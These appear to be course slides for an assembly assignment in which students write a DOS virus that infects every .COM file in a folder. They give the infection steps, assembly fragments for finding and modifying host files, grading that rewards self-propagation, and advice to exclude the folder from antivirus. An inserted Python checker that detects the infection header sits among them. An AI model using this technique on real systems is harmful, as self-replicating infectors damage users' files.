Assignment 4 Introduction


Assembly TA Wei-Yen Day


Computer Virus Basics

• A program attaches itself to another program

• Reproduces itself

• Executed later and creates more copies

– 1.COM-> 2.COM 3.COM …

• It can certainly dig into your computer and do things you don’t want


Structure of Virus

• 2 basic routines!

– Search

– Copy itself

• Other routines are a bit more complex

– Anti-detection

– Anti-anti-virus


Virus Classification

• According to the types of programs they infect

– They may infect COM, EXE, or SYS files

• Note that a virus can be written to infect any kind of code

– C, Basic, a batch file, a Paradox or Dbase program


COM File Structure

• When one enters the name of program,

– DOS begins looking for COM, EXE, and BAT

• COM files are much simpler

– They have predefined segment format

– EXE files’ format is defined by the programmer

– A COM file is a direct binary image of what should be put into memory and executed by the CPU


Assignment 4: Justin Virus



• Infect all .COM programs under the same folder and print some mischievous lines




Virus Symbol

• Retain 5 bytes

– 3 bytes for jmp

– 2 bytes for mark of virus

• Infect a ?? program when the virus is executed

– nop, nop, nop, nop, nop (5 placeholder bytes)


More About Virus


Checking Memory

• Compute the size from normal program to


• Actual program size

– We call it “si”

– pop si ;si is p1+p2

– sub si, offset here ;then si is p2

• Every memory address used inside the virus must have “si” added to it


Recover Original Program

• For the first execution, we should add 5 nops to reserve the space (see p.7)

• Recover original program to memory (P1)

– mov ax, word ptr ds:FIRST_5_BYTE[si]

– mov ds:[100h], ax

– mov ax, word ptr ds:FIRST_5_BYTE[si+2]

– mov ds:[100h+2], ax

– mov al, byte ptr ds:FIRST_5_BYTE[si+4] ;al is 8-bit, so the fifth byte needs byte ptr

– mov ds:[100h+4], al


Write Back P1


Print Mischievous Word

• Print some mischievous words

• When the infected file is executed, it prints the words produced by the virus first

• Infect others


Search Next File(1)


– mov dx,OFFSET COM_MASK ;search for COM files

– mov ah,4EH ;DOS find first file function

– xor cx,cx ;CX holds all file attributes


– int 21h

– jc FIND_EXIT ;Exit if no files found

– call FILE_OK ;file OK to infect?

– jc FIND_NEXT ;nope, look for another


Search Next File (2)


– ret ;else return with z set


– mov ah,4FH ;DOS find next file function

– jmp FIND_LOOP ;Try finding another file



– Check whether the virus pattern exists


File OK, Infect It

• Back up the first 5 bytes of the original program

• Copy virus itself to the program

• Move the file pointer to the head, and write the first 5 bytes

– Write v1

– 3 bytes are jmp

– 2 bytes are pattern

• Infect next file
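A detection-side counterpart to the header layout on the Virus Symbol and File OK slides: an added Python checker (not part of the assignment or its reference code) that looks for the 3-byte near JMP plus 2-byte mark at the start of a .COM image and verifies that the JMP lands inside the file. The mark value `JV`, the sample byte strings and the function names are constructed assumptions, since the slides do not give them.

```python
import struct
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Optional

COM_LOAD_OFFSET = 0x100   # a COM image is loaded and entered at CS:0100h
JMP_NEAR = 0xE9           # opcode of the 3-byte near JMP (E9 lo hi)
MARKER = b"JV"            # assumed 2-byte virus mark; the slides do not give the value


@dataclass
class ScanResult:
    infected: bool
    reason: str
    jmp_file_offset: Optional[int] = None  # where the entry JMP lands, as a file offset


def scan_com_image(data: bytes) -> ScanResult:
    """Decide whether a COM image carries the 5-byte header (JMP + mark)."""
    if len(data) < 5:
        return ScanResult(False, "shorter than the 5-byte header")
    if data[0] != JMP_NEAR:
        return ScanResult(False, "entry point is not a near JMP")
    # rel16 is relative to the IP after the 3-byte instruction; map it to a file offset
    disp = struct.unpack_from("<h", data, 1)[0]
    target = (COM_LOAD_OFFSET + 3 + disp) & 0xFFFF
    file_off = target - COM_LOAD_OFFSET
    if data[3:5] != MARKER:
        return ScanResult(False, "JMP present but no virus mark", file_off)
    if not 5 <= file_off < len(data):
        return ScanResult(False, "mark present but JMP leaves the image", file_off)
    return ScanResult(True, "JMP + mark header found", file_off)


def scan_folder(folder: str) -> Dict[str, ScanResult]:
    """Scan every .COM file in one folder, the same scope the virus searches."""
    return {p.name: scan_com_image(p.read_bytes())
            for p in sorted(Path(folder).glob("*.[cC][oO][mM]"))}


# Constructed samples (not real programs). Host: an 8-byte program whose first
# 5 bytes were replaced by the header; the appended code begins at file offset 8,
# so the JMP displacement is 0x108 - (0x100 + 3) = 5.
CLEAN_SAMPLE = b"\xB4\x09\xBA\x0A\x01\xCD\x21\xC3"
INFECTED_SAMPLE = (b"\xE9\x05\x00" + MARKER        # 5-byte header
                   + b"\xCD\x21\xC3"               # surviving tail of the host
                   + b"\x90\x90\x90\x90\x90\xC3")  # appended code (5 nops + ret)
```

Many legitimate COM programs also start with E9, so the JMP alone is never treated as a hit; only the mark plus an in-image JMP target is.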


The Infecting Mission is Done!

• Let’s take an overview again:

• 1. Check Memory (store p2 size)

• 2. Recover original program

• 3. Print Lines

• 4. Search File to Infect

• 5. Infect it

• 6. Loop steps 3 and 4

• 7. If no file can be infected, then the mission is completed


Procedure of Justin




Assignment 4 Note

• The .COM files (the files your virus must infect) are here

• When you compile your code to produce a virus, the anti-virus software on your computer might alert

– Try to set your anti-virus software to exclude the folder your virus is in


Checking Scenario

• The following is the judgment of assignment 4:

– If your virus can infect a .COM file (copy itself onto another), you get the basic score

– If your virus can infect all .COM files under the same folder, you can get a better score

– If your virus can infect all .COM files under the same folder, and when you open the infected file, it infects all other files, you get a nice score

• If your virus can do all of above, and can avoid infecting files repeatedly, you do a good job!

– If your virus crashes my computer, I would …


Now it’s your turn!

• Don’t just copy my code, think about it at first

• Actually it’s a simple virus, and it’s easy work

• If you have any problem, google it! XD

• You can also discuss with me for sure

• Good luck to you guys!



